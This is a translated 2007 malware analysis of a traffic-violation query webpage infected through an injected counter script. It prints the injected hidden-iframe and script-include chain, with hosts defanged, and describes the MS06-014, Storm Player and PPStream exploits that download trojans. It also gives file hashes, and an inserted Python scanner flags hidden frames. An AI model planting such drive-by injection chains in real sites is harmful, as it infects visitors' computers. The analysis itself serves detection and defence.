Traffic violation query webpage infected with Virus.Win32.AutoRun.xu


Endurer original
2007-10-26 1st version

The problem lies in the counter code used by the webpage:
/---
<SCRIPT src="hxxp://www.H*C**JJ***d.com/wfcx/count/online.asp"></SCRIPT>
---/

The code of hxxp://www.H*C**JJ**d.com/wfcx/count/online.asp:
/---
<IFRAME src = hxxp: // user *. free.77 ** 16 * 9.net/%73%61%74%61%6e%6c%73%78/sa.htm width = 100 Height = 0> </iframe> <IFRAME src = "hxxp: // web **. * 59 *** cn.cn/siyua/index.htm "width = 100 Height = 0> </iframe> <IFRAME src =" hxxp: // web **. * 59 *** cn.cn/siyua/index.htm "width = 100 Height = 0> </iframe> <IFRAME src =" hxxp: // web **. * 59 *** cn.cn/siyua/index.htm "width = 100 Height = 0> </iframe> <IFRAME src =" hxxp: // web **. * 59 *** cn.cn/bzsiyu/index.htm "width = 100 Height = 0> </iframe> <IFRAME src =" hxxp: // web **. * 59 * ** cn.cn/bzsiyu/index.htm "width = 100 Height = 0> </iframe> <IFRAME src =" hxxp: // hack ** T * ao. Q ** yun.net/"width = 100 Height = 0> </iframe>
<IFRAME src = hxxp: // W **. 7 *** 373 * 4.cn/reg.htm? A width = 100 Height = 0 frameborder = 0> </iframe> <IFRAME src = "hxxp: // C *. th * E ** c.cn/hacktao/ "width = 100 Height = 0> </iframe>
<IFRAME src = "hxxp: // M **. thie ** c.cn/siyua/" width = 100 Height = 0> </iframe>
<IFRAME src = "hxxp: // M **. thie ** c.cn/siyua/" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // B ** zsiyua *. 5 *** 12j.com/" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // ** siyua *. Host ** 1.8 ** MA * k.com/" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/1.htm "width = 0 Height = 0> </iframe> <IFRAME src =" hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/"width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // ** siyua *. Host ** 1.8 ** MA * k.com/" width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. m ** 8*585 ** 3.com.cn/index.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. m ** 8*585 ** 3.cn/muma/index.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. N * 8*585 ** 3.cn/index.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. M ** 8*585 ** 3.cn/gogo/index.htm width = 0 Height = 0> </iframe> <IFRAME src = hxxp: // www. M ** 8*585 ** 3.com.cn/index.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. m ** 8*585 ** 3.cn/muma/index.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. N * 8*585 ** 3.cn/index.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. M ** 8*585 ** 3.cn/gogo/index.htm width = 0 Height = 0> </iframe> <IFRAME width = 0 Height = 0> </iframe> <IFRAME width = 0 Height = 0> </iframe> <IFRAME src = "hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/"width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // W **. m ** H ** 88 *** 88.cn/ad.htm? A width = 100 Height = 0 frameborder = 0> </iframe>
<IFRAME src = hxxp: // W **. 7 *** 373 * 4.cn/reg.htm? A width = 100 Height = 0 frameborder = 0> </iframe> <IFRAME src = "hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/"width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // ** siyua *. Host ** 1.8 ** MA * k.com/" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // ** siyua *. Host ** 1.8 ** MA * k.com/" width = 0 Height = 0> </iframe>
<IFRAME Height = 0 width = 0> </iframe> <IFRAME src = "hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/"width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www.8 **** 8o * u.cn/index.htm Height = 0 width = 0> </iframe> <IFRAME src = hxxp: // www.8 * 8o * u.cn/index.htm Height = 0 width = 0> </iframe> <IFRAME src = "hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/"width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. M ** HT * Engl * ong.com/mm.htm Height = 0 width = 0> </iframe> <IFRAME src = hxxp: // www. M ** HT * Engl * ong.com/mm.htm Height = 0 width = 0> </iframe> <IFRAME src = hxxp: // www. M ** HT * Engl * ong.com/mm.htm Height = 0 width = 0> </iframe> <IFRAME src = "hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/"width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // useri. free ** 2.7 ** 716 * 9.net/siyua/ "width = 0 Height = 0> </iframe> <IFRAME src = hxxp: // www.8 **** 8o * u.cn/ip/1.htm Height = 0 width = 0> </iframe> <IFRAME src = hxxp: // www.8 * 8o * u.cn/ip/1.htm Height = 0 width = 0> </iframe> <IFRAME src = "hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/"width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // useri. free ** 2.7 ** 716 * 9.net/siyua/ "width = 0 Height = 0> </iframe> <IFRAME src = hxxp: // www.8 **** 8o * u.cn/ip/1.htm Height = 0 width = 0> </iframe>
Document. write ("<a href = hxxp: // www. H * C ** JJ *** d.com/wfcx/count/showonline.asp Title = view the list of current online users> <font color = Red> current online <strong> 1 </strong> person </font> </A> ")
---/
That is a lot of frames hung off one counter script ~
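As an added example (not code from the original post), a small Python scanner that applies the two checks this analysis turns on: a `<script src>` pulled from a host other than the page's own (the counter above) and `<iframe>` tags sized to 0 or 1 pixel, with percent-encoded paths decoded so that obfuscated hosts and paths show up in plain text. The sample HTML and the example.test hostnames are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample page: a third-party counter script plus hidden frames,
# modelled on the injected online.asp counter above. Hostnames are placeholders.
SAMPLE_HTML = """
<html><body>
<script src="http://counter.example.test/count/online.asp"></script>
<iframe src="http://payload.example.test/%73%61/kl.htm" width=0 height=0></iframe>
<iframe src=http://ads.example.test/reg.htm?a width=100 height=0 frameborder=0></iframe>
<iframe src="http://www.example.test/help.htm" width=600 height=400></iframe>
<script src="/js/site.js"></script>
</body></html>
"""


def _tiny(value):
    """True for a width/height of 0 or 1 (hidden or one-pixel frame)."""
    digits = re.sub(r"[^0-9]", "", value)
    return digits != "" and int(digits) <= 1


class HiddenLoaderScanner(HTMLParser):
    """Collects iframes sized to hide and scripts loaded from other hosts."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []  # list of (kind, decoded_src)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        src = unquote(a.get("src", "")).strip()  # reveal %xx-encoded paths
        if tag == "iframe":
            if _tiny(a.get("width", "")) or _tiny(a.get("height", "")):
                self.findings.append(("hidden-iframe", src))
        elif tag == "script" and src:
            host = urlparse(src).hostname
            if host and host.lower() != self.page_host:
                self.findings.append(("external-script", src))


def scan(html, page_host):
    """Return the suspicious tags found in html served from page_host."""
    parser = HiddenLoaderScanner(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for kind, src in scan(SAMPLE_HTML, "www.example.test"):
        print(f"{kind:16} {src}")
```

Same-host script includes (like /js/site.js) and normally sized frames are left alone, so the output is only the counter include and the two hidden frames, with the %73%61 path shown decoded.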

I found the code of hxxp://W***.7***373*4.cn/reg.htm?A:
/---
<IFRAME src="dog.htm" width=1 height=0></IFRAME>
<SCRIPT src="haha.js"></SCRIPT>
<SCRIPT src='hxxp://s*89.cnzz.com/stat.php?id=5*372*23&web_id=5*372*23&show=pic2' language='javascript' charset='gb2312'></SCRIPT>
---/

The content of hxxp://W**.7**373*4.cn/dog.htm:
/---
<IFRAME src=hxxp://A*A.1***8d*d.net/ww/new04.htm?xinjiang width=0 height=0></IFRAME>
---/

The content of hxxp://A*A.1***8d*d.net/ww/new04.htm?xinjiang is:
/---
<IFRAME width='0' height='0' src='hxxp://A*A.1***8d*d.net/aa/kl.htm'></IFRAME>
<SCRIPT language="JavaScript" type="text/javascript" src="hxxp://js.users.51.la/12**996*44.js"></SCRIPT>
---/

The content of hxxp://A*A.1***8d*d.net/aa/kl.htm is encrypted JavaScript. After two rounds of decryption the original code is obtained. Its function is: if the cookie variable OK does not exist, create it and include the exploit code:
/---
<SCRIPT src=hxxp://A*A.1***8d*d.net//aa//1.js></SCRIPT>
<SCRIPT src=hxxp://A*A.1***8d*d.net//aa//B.js></SCRIPT>
<SCRIPT src=hxxp://A*A.1***8d*d.net//aa//pps.js></SCRIPT>
---/

and then downloads hxxp://down**.1***8d*di*.net/BB/bd.cab.

hxxp://A*A.1***8d*d.net/aa/1.js uses the MS06-014 vulnerability to download hxxp://down****.1*8d*di*.net/BB/014.exe, save it as ntuser.com, and run it with cmd.exe.

File description: D:/test/014.exe
Attributes: A---
An error occurred while obtaining the file version information!
Creation time: 13:48:14
Modification time: 13:48:14
Access time: 13:14:48
Size: 37888 bytes, 37.0 KB
MD5: 6d84039e781655f16185023a7a7c09e1
SHA1: 3fd12be3d86df261438bbed126c507d1e14a90e0
CRC32: 597058c5

 

Scanned file: 014.exe - infected

014.exe - infected by Virus.Win32.AutoRun.xu
hxxp://A*A.1***8d*d.net/aa/B.js exploits the multiple remote overflow vulnerabilities in the Storm Player (暴风影音) MPS.dll ActiveX control (refer to: hxxp://www.nsfocus.net/vulndb/10900).

hxxp://A*A.1***8d*d.net/aa/pps.js exploits the PPStream vulnerability.

hxxp://down**.1*****8d*di*.net/BB/bd.cab contains bd.exe, which is the same file as 014.exe.

hxxp://W**.7**373*4.cn/haha.js uses the MS06-014 vulnerability to download hxxp://www.m***IR***7***21.com/mir721.exe

File description: D:/test/mir721.exe
Attributes: ---
An error occurred while obtaining the file version information!
Creation time: 13:36:26
Modification time: 13:36:27
Access time: 13:38:37
Size: 28376 bytes, 27.728 KB
MD5: cfc4727cb3e255a15a3da2cdad8e60eb
SHA1: bcc8b3e76852bf6fc0d5661d93868e1f78dc2c38
CRC32: 201711c50

Rising reports: Win32.seg.BC

Scanned file: mir721.exe - infected

mir721.exe - infected by Trojan.Win32.Agent.bwt

 
